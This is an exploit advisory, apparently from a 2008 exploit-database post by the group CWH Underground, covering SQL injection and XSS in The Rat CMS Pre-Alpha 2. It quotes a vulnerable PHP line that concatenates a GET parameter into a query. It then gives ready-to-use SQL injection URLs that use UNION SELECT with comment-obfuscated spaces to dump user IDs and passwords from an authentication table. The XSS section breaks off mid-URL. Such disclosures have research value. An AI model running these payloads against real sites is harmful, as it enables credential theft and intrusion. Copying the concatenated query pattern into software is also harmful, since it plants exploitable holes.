|
===========================================================0D
The Rat CMS (SQL/XSS) Multiple Remote Vulnerabilities=0D
===========================================================0D
=0D
,--^----------,--------,-----,-------^--,=0D
| ||||||||| `--------' | O .. CWH Underground Hacking Team ..=0D
`+---------------------------^----------|=0D
`\_,-------, _________________________|=0D
/ XXXXXX /`| /=0D
/ XXXXXX / `\ /=0D
/ XXXXXX /\______(=0D
/ XXXXXX / =0D
/ XXXXXX /=0D
(________( =0D
`------'=0D
=0D
=0D
AUTHOR : CWH Underground=0D
DATE : 25 June 2008=0D
SITE : cwh.citec.us=0D
=0D
=0D
#####################################################=0D
APPLICATION : The Rat CMS=0D
VERSION : Pre-Alpha 2=0D
VENDOR : N/A=0D
DOWNLOAD : http://downloads.sourceforge.net/the-rat-cms=0D
#####################################################=0D
=0D
--- Remote SQL Injection ---=0D
=0D
---------------------------------------=0D
Vulnerable File [viewarticle.php?id=]=0D
---------------------------------------=0D
=0D
@Line 5=0D
=0D
73: $query = "SELECT title, content FROM news WHERE id=".$_GET['id'];=0D
74: $result = mysql_query($query) or die('Error : ' . mysql_error()); =0D
75: $row = mysql_fetch_array($result, MYSQL_ASSOC); =0D
=0D
=0D
---------=0D
Exploit=0D
---------=0D
=0D
[+] http://[Target]/[trcms_path]/viewarticle.php?id=[SQL Injection]=0D
[+] http://[Target]/[trcms_path]/viewarticle2.php?id=[SQL Injection]=0D
=0D
=0D
-------------=0D
POC Exploit=0D
-------------=0D
=0D
http://192.168.24.25/trcms/viewarticle.php?id=-9999/**/UNION/**/SELECT/**/user_id,user_password/**/FROM/**/tbl_auth_user--=0D
http://192.168.24.25/trcms/viewarticle2.php?id=-9999/**/UNION/**/SELECT/**/user_id,user_password/**/FROM/**/tbl_auth_user--=0D
=0D
=0D
--- Remote XSS ---=0D
=0D
---------=0D
Exploit=0D
---------=0D
=0D
[+] http://[Target]/[trcms_path]/viewarticle.php/